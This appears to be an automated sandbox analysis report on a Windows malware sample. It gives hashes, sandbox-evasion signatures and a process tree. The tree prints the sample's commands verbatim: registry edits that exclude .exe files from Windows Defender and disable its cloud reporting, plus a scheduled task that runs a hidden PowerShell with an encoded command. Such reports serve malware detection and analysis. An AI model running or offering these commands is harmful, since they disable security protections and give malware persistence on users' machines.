Analysis
-
max time kernel
32s -
max time network
71s -
platform
windows10-2004_x64 -
resource
win10v2004-20230915-en -
resource tags
arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system -
submitted
11/10/2023, 07:20
Static task
static1
Behavioral task
behavioral1
Sample
9fb75c95723dd6c62194a06f9ca03d3f1682f7682dcd36a7701defd2e944c839.exe
Resource
win7-20230831-en
Behavioral task
behavioral2
Sample
9fb75c95723dd6c62194a06f9ca03d3f1682f7682dcd36a7701defd2e944c839.exe
Resource
win10v2004-20230915-en
General
-
Target
9fb75c95723dd6c62194a06f9ca03d3f1682f7682dcd36a7701defd2e944c839.exe
-
Size
7.2MB
-
MD5
6d7fdfe7c1337d85a9f250131896593f
-
SHA1
bafa98789d4ea9e3368ffe11a1fdd29370d643f2
-
SHA256
9fb75c95723dd6c62194a06f9ca03d3f1682f7682dcd36a7701defd2e944c839
-
SHA512
164c3536fee1d940ca919e3adf62c47032c6347b2fa2f256de96852ba664abf95a30c944d07c5c9777d5c00bff26468b7aecb12c007bf4b95cbfcde2998149b5
-
SSDEEP
196608:91OW+4IVcXicGBxgrSjz+NieYrJjj6G6/+6bJIKU:3OWj6cycGBxg2/xrJjShvU
Malware Config
Signatures
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation Install.exe -
Executes dropped EXE 2 IoCs
pid Process 2256 Install.exe 1388 Install.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 5044 schtasks.exe -
Enumerates system info in registry 2 TTPs 2 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 3724 powershell.EXE -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3724 powershell.EXE -
Suspicious use of WriteProcessMemory 36 IoCs
description pid Process procid_target PID 4560 wrote to memory of 2256 4560 9fb75c95723dd6c62194a06f9ca03d3f1682f7682dcd36a7701defd2e944c839.exe 86 PID 4560 wrote to memory of 2256 4560 9fb75c95723dd6c62194a06f9ca03d3f1682f7682dcd36a7701defd2e944c839.exe 86 PID 4560 wrote to memory of 2256 4560 9fb75c95723dd6c62194a06f9ca03d3f1682f7682dcd36a7701defd2e944c839.exe 86 PID 2256 wrote to memory of 1388 2256 Install.exe 88 PID 2256 wrote to memory of 1388 2256 Install.exe 88 PID 2256 wrote to memory of 1388 2256 Install.exe 88 PID 1388 wrote to memory of 4344 1388 Install.exe 90 PID 1388 wrote to memory of 4344 1388 Install.exe 90 PID 1388 wrote to memory of 4344 1388 Install.exe 90 PID 1388 wrote to memory of 4800 1388 Install.exe 92 PID 1388 wrote to memory of 4800 1388 Install.exe 92 PID 1388 wrote to memory of 4800 1388 Install.exe 92 PID 4800 wrote to memory of 5000 4800 forfiles.exe 94 PID 4800 wrote to memory of 5000 4800 forfiles.exe 94 PID 4800 wrote to memory of 5000 4800 forfiles.exe 94 PID 4344 wrote to memory of 4352 4344 forfiles.exe 95 PID 4344 wrote to memory of 4352 4344 forfiles.exe 95 PID 4344 wrote to memory of 4352 4344 forfiles.exe 95 PID 4352 wrote to memory of 4520 4352 cmd.exe 96 PID 4352 wrote to memory of 4520 4352 cmd.exe 96 PID 4352 wrote to memory of 4520 4352 cmd.exe 96 PID 5000 wrote to memory of 3896 5000 cmd.exe 97 PID 5000 wrote to memory of 3896 5000 cmd.exe 97 PID 5000 wrote to memory of 3896 5000 cmd.exe 97 PID 5000 wrote to memory of 3816 5000 cmd.exe 98 PID 5000 wrote to memory of 3816 5000 cmd.exe 98 PID 5000 wrote to memory of 3816 5000 cmd.exe 98 PID 4352 wrote to memory of 4724 4352 cmd.exe 99 PID 4352 wrote to memory of 4724 4352 cmd.exe 99 PID 4352 wrote to memory of 4724 4352 cmd.exe 99 PID 1388 wrote to memory of 5044 1388 Install.exe 103 PID 1388 wrote to memory of 5044 1388 Install.exe 103 PID 1388 wrote to memory of 5044 1388 Install.exe 103 PID 1388 wrote to memory of 2540 1388 Install.exe 106 PID 1388 wrote to memory of 2540 1388 Install.exe 106 PID 1388 wrote to memory of 2540 1388 Install.exe 106
Processes
-
C:\Users\Admin\AppData\Local\Temp\9fb75c95723dd6c62194a06f9ca03d3f1682f7682dcd36a7701defd2e944c839.exe"C:\Users\Admin\AppData\Local\Temp\9fb75c95723dd6c62194a06f9ca03d3f1682f7682dcd36a7701defd2e944c839.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:4560 -
C:\Users\Admin\AppData\Local\Temp\7zSCB10.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2256 -
C:\Users\Admin\AppData\Local\Temp\7zSCE5C.tmp\Install.exe.\Install.exe /QqGWdiddNtBW "385118" /S3⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4352 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4520
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:4724
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:5000 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:3896
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:3816
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gZsNDiSzx" /SC once /ST 09:37:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:5044
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gZsNDiSzx"4⤵PID:2540
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3724
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
6.1MB
MD5806a3c132fef2db23e92352e7fbac7da
SHA13afb54e88efae66fa70f9aa716499e669a80deb5
SHA25617444ceca52f690af8b30a59f77cfe0aaa7fd4f86c1e8c58c429c56f215b3ef0
SHA51220bdbf8e1a4b524f39b3b0600f6efeacd0a98df0096a552ad078c53f65c770b2ed4b40dfea6157ccba5075ef7fe2d146e10459a7a2f5ba29b7ed9054e2a6c372
-
Filesize
6.1MB
MD5806a3c132fef2db23e92352e7fbac7da
SHA13afb54e88efae66fa70f9aa716499e669a80deb5
SHA25617444ceca52f690af8b30a59f77cfe0aaa7fd4f86c1e8c58c429c56f215b3ef0
SHA51220bdbf8e1a4b524f39b3b0600f6efeacd0a98df0096a552ad078c53f65c770b2ed4b40dfea6157ccba5075ef7fe2d146e10459a7a2f5ba29b7ed9054e2a6c372
-
Filesize
6.9MB
MD524f6eeaf895779371db8825a6efb1812
SHA1c6e7773f1be258ba400c230a7127749f12ae6b8a
SHA256e4cadfebbb72420b99aeef1ffb74918083148d1841458566e2e11cec069c2704
SHA5125ad636a2b8a1111cca88f7426a85b2f1c7ffea2debaba4cb2e97eb982b223e30c4a6e228c13aab384d4e61350d08e84e7db00c8ba7928974b117cfc475ea2d9d
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82